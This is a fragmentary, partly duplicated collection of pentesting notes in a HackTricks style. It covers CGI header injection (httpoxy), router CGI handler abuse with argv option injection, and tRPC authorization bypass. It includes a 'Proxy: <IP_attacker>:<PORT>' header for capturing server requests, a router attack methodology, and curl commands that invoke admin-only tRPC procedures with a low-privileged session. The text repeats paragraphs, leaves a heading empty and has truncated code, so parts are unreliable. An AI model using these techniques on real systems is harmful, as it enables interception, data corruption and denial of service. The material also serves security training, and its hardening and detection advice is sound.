sudo -V| grep"Sudo ver"| grep"1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"

From@sickrov

> run

CGI creates a environment variable for each header in the http request. Forexample: "host:web.com" is createdas"HTTP_HOST"="web.com"

Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (forexample,`/cgi-bin/cstecgi.cgi`) and use a selector parameter suchas`topicurl=<handler>` to route the request to an internal function.

As the HTTP_PROXY variable could be used by the web server. Try to send a**header** containing: "**Proxy:&lt;IP_attacker&gt;:&lt;PORT&gt;**" and if the server performs any request during the session. You will be able to capture each request made by the server.

Methodology to exploit these routers:

- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher.

- Test unauthenticated reachability: some handlers forget auth checks and are directly callable.

- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen`-`.

Generic exploit shapes:

Detection and hardening:

- Watch for unauthenticated requests to centralized CGI endpoints with`topicurl` set to sensitive handlers.

- Flag parameters that begin with`-` (argv option injection attempts).

- Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags.

**More info about the vuln and possible exploits:**[**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,**[**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,**[**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,**[**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**

{{#include ../../banners/hacktricks-training.md}}

CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"

As the HTTP_PROXY variable could be used by the web server. Try to send a**header** containing: "**Proxy:&lt;IP_attacker&gt;:&lt;PORT&gt;**" and if the server performs any request during the session. You will be able to capture each request made by the server.

-[Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)

{{#include ../../banners/hacktricks-training.md}}

-**Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing.

-**Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions.

Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC,`protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by`protectedProcedure`.

- Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control).

- Black-box signal:`POST /api/trpc/<router>.<procedure>` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability.

- Typical tRPC route shape (v10+): JSON body wrapped under`{"input": {...}}`.

Example vulnerable pattern (no role/permission gate):

retry:protectedProcedure

.input(z.object({ name:z.string() }))

.mutation(async ({input,ctx })=> {

}),

Practical exploitation (black-box)

1) Register a normal account and obtain an authenticated session (cookies/headers).

2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures.

curl -s -X POST'https://<tenant>/api/trpc/backgroundMigrations.all' \

-H'Content-Type: application/json' \

-b'<AUTH_COOKIES>' \

--data'{"input":{}}'

3) Invoke privileged actions such as restarting a job:

curl -s -X POST'https://<tenant>/api/trpc/backgroundMigrations.retry' \

-H'Content-Type: application/json' \

-b'<AUTH_COOKIES>' \

--data'{"input":{"name":"<migration_name>"}}'

Impact to assess

- Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics).

- DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages.

-[**kiterunner**](https://github.com/assetnote/kiterunner): Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs.

-[How An Authorization Flaw Reveals A Common Security Blind Spot:CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study)

{{#include ../../banners/hacktricks-training.md}}